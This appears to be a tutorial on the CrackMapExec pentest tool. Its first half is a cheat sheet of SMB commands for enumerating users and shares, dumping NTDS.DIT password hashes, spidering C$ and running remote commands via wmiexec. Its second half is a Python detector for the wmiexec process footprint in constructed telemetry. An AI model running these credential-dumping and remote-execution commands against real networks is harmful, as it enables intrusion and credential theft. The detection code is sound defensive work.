Test tool: CrackMapExec, remotely executing Windows commands


Tool link: https://github.com/byt3bl33d3r/CrackMapExec

Install under Kali

apt-get install crackmapexec
apt-get install -y libssl-dev libffi-dev python-dev build-essential
pip install --user pipenv
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec && pipenv install
pipenv shell
python setup.py install

Usage

Enter the CrackMapExec directory, run pipenv shell, and then invoke the tool as cme.

Official examples

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

Test

#### List shares
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares
#### List sessions
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions
#### List disks
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks
#### List logged-on users
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users
#### List domain users
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users
#### Enumerate users by brute-forcing RIDs
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute
#### List domain groups
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups
#### List local groups
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups
#### List the domain password policy
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol
#### Try a null session (empty username and password)
cme smb 192.168.127.235 -u '' -p ''
#### Authenticate against the specified domain
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET
#### Dump NTDS.DIT including password history
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history
#### Spider the C$ share (optionally only files matching a pattern)
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$

#### Remote command execution (-X runs a PowerShell command, -x runs a cmd.exe command; --exec-method selects the launcher, here wmiexec)
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$PSVersionTable' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$set' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'ipconfig /all' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'tasklist /svc' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -x ipconfig
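The wmiexec method used above leaves a recognisable footprint on the target: WmiPrvSE.exe spawns cmd.exe with /Q /c and the output redirected to the ADMIN$ share via 127.0.0.1 (with -X the inner command is a powershell.exe invocation, still wrapped the same way). The following is an added example, not code from the page or from CrackMapExec, showing how a defender would flag that pattern in process-creation telemetry. The ProcRecord shape and the sample records are constructed to resemble Sysmon event 1 fields; the hostname and timestamps are invented.

```python
"""Flag process-creation records that match the wmiexec execution footprint.

Added example (not part of CrackMapExec). Detection logic: parent image is
WmiPrvSE.exe, child is cmd.exe, command line carries "/Q /c" and redirects
output to \\127.0.0.1\ADMIN$\__<stamp>. Records below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcRecord:
    """Minimal Sysmon-like process-creation record (constructed shape)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Output redirection wmiexec appends: 1> \\127.0.0.1\ADMIN$\__<stamp> 2>&1
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_wmiexec_like(rec: ProcRecord) -> bool:
    """True when the record matches the WmiPrvSE -> cmd.exe /Q /c + ADMIN$ pattern."""
    if _basename(rec.parent_image) != "wmiprvse.exe":
        return False
    if _basename(rec.image) != "cmd.exe":
        return False
    if "/q /c" not in rec.command_line.lower():
        return False
    return WMIEXEC_REDIRECT.search(rec.command_line) is not None


def find_wmiexec(records):
    """Filter a list of records down to the wmiexec-like ones."""
    return [r for r in records if is_wmiexec_like(r)]


# Constructed sample telemetry: one wmiexec-style launch, one interactive
# shell, and one legitimate WMI-spawned cmd.exe without the redirection.
SAMPLE_RECORDS = [
    ProcRecord("WIN10-LAB", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"C:\Windows\System32\cmd.exe",
               r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1617000000.12 2>&1"),
    ProcRecord("WIN10-LAB", r"C:\Windows\explorer.exe",
               r"C:\Windows\System32\cmd.exe",
               r"cmd.exe /c whoami"),
    ProcRecord("WIN10-LAB", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"C:\Windows\System32\cmd.exe",
               r"cmd.exe /c echo legit-wmi-scheduled-task"),
]


def main():
    for r in find_wmiexec(SAMPLE_RECORDS):
        print(f"[wmiexec-like] host={r.host} parent={r.parent_image} cmd={r.command_line}")


if __name__ == "__main__":
    main()
```

Only the first constructed record is flagged; the WmiPrvSE-spawned cmd.exe without the ADMIN$ redirection is left alone, which keeps ordinary WMI-driven automation out of the alert. On real telemetry the same three conditions map directly onto Sysmon's ParentImage, Image and CommandLine fields.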
